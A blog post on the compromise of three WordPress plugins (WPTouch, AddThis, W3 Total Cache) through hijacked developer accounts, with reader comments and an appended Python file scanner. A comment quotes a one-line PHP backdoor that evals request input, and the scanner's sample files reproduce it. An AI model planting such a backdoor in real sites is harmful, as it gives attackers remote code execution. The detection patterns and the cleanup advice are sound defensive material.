WordPress Security Exploit Found: Upgrade WPTouch, AddThis and W3 Total Cache

Notice that you can’t get access to the forums or trac? Can’t commit a plugin or theme? Yesterday Matt announced that WordPress had force-reset all WordPress passwords due to a security breach. Three popular plugins, WPTouch, AddThis and W3 Total Cache, were found to contain backdoor trojans. These were not added by the plugin developers themselves: their own WordPress accounts were compromised and new versions of the plugins were uploaded.

Let’s Look at The Scale of the Problem

A quick look at the stats in the WordPress repository gives an indication of quite how big the potential problem is:

Aaron at AddThis has said on his blog that the offending version is 2.1.3, but only if it was downloaded on 20th or 21st June. It was downloaded 3,583 times yesterday. Here’s how many people are currently using 2.1.3:

AddThis 2.1.3 with 14.3% share of active plugins

The affected versions of WPTouch are 1.9.27 and 1.9.28, again only if you updated in the past few days. It was downloaded 14,670 times yesterday. Here’s how many people are using those versions:

WPTouch 1.9.27 used by 15.3% of active users

I can’t find which version of W3 Total Cache is affected, but from the uploads on its trac page it looks like 0.9.2.2 (please correct me if that’s wrong!). Again, check your dates. It was downloaded 3,442 times yesterday.

W3 Total Cache stats showing 28.6% of users using 0.9.2.2

Again, I really want to stress that the real issue is with plugins updated or downloaded on 20th or 21st June. Personally, I struggle to remember what I’ve done over the past few days, so to be safe I would update these plugins; it’s always good to be up to date anyway.

What Should I Do?

  • Don’t panic or fire off angry emails
  • Upgrade these plugins immediately: they all have new versions that remove the backdoored code
  • Change all of your passwords

To keep up to date, watch the WordPress News blog, which carries the latest and most important WordPress happenings.

Comments (9)

  1. I can confirm, having 2 of these plugins installed, that I had a trojan set itself up cozy in my server last week, and I spent about a day cleansing it.
    The affected files, in my case, were all index.php files, with the classic “eval(base64_decode(” code, which inserted “<iframe” codes at the start of all web pages.

    From your web root, you can run this command to see if it has crept into any files:
    find . -exec grep "eval(base64_decode" '{}' \; -print, but the real source was probably another file with code like this:
    <?php if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));

  2. Well, the biggest worrying questions in my opinion are:
    1. How did that happen in the first place?
    2. How did the hackers manage to insert that code in 3 different plugins almost all at once?
    3. How to prevent that from happening again to other plugins?

  3. The more immediate question is surely:

    How many other plugins have been affected but we don’t know about it yet?

    Have they done a repository scan to ensure it is really only these three plugins? Or how can we be sure that it is only these three plugins?

  4. Indeed, this exploit has been documented for WP-phpMyAdmin (and perhaps other installations of phpMyAdmin or phpPgAdmin). It’s a good idea to scan your files, as I showed above, if you suspect anything.
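A small scanner for the two indicators named in comments 1 and 4 above (the “eval(base64_decode(” string and an eval() fed from $_REQUEST), as an added example that is not from the post or its commenters; it walks a tree the way the find command does and reports file, line and which indicator matched. The sample tree, its paths and file contents are constructed for the demonstration and are not real plugin code.

```python
import os
import re
import tempfile

# Two indicators from the comments: obfuscated eval(base64_decode(...)) and eval() fed from request input.
INDICATORS = {
    "base64-eval": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "request-eval": re.compile(r"eval\s*\(.*\$_(?:REQUEST|GET|POST|COOKIE)\b"),
}
PHP_EXTENSIONS = (".php", ".phtml", ".inc")

def scan_file(path):
    """Return [(indicator, line_no, line_text)] for each matching line in one file."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line_no, line in enumerate(fh, start=1):
            for name, rx in INDICATORS.items():
                if rx.search(line):
                    hits.append((name, line_no, line.strip()[:80]))
    return hits

def scan_tree(root):
    """Walk root like `find .`; map each flagged PHP file (relative path) to its hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(PHP_EXTENSIONS):
                continue
            hits = scan_file(os.path.join(dirpath, fname))
            if hits:
                rel = os.path.relpath(os.path.join(dirpath, fname), root)
                report[rel.replace(os.sep, "/")] = hits
    return report

# Constructed sample tree (hypothetical paths and contents, not real plugin code); 'aGVsbG8=' is just "hello".
SAMPLE_FILES = {
    "index.php": "<?php\neval(base64_decode('aGVsbG8='));\nrequire 'wp-blog-header.php';\n",
    "wp-content/plugins/example/helper.php": "<?php if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));\n",
    "wp-content/plugins/example/clean.php": "<?php\necho base64_decode('aGVsbG8=');\n",
    "readme.txt": "eval(base64_decode( in a text file is skipped by the extension filter\n",
}

def build_sample_tree():  # writes SAMPLE_FILES under a fresh temp directory, returns its path
    root = tempfile.mkdtemp(prefix="wp-scan-")
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```

Run scan_tree() against a real web root to get the same report; build_sample_tree() only exists to exercise the scanner offline.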
